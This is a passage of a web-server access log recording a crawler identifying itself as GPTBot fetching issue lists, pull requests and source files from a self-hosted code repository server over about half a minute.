Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:18:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:18:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:18:15:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:15:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:15:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:15:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/project.nuget.cache" -[17/Feb/2026:18:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12770] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13539] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12808] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15325] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15371] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12807] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15371] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12806] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13503] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13537] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15371] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13535] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:18:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12758] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:18:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py?display=source" [Client 74.7.227.38] [Length 17642] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:18:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:18:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:18:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.spec" -[17/Feb/2026:18:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36190] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" -[17/Feb/2026:18:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:16:14 +0000] - 200 200 - GET https 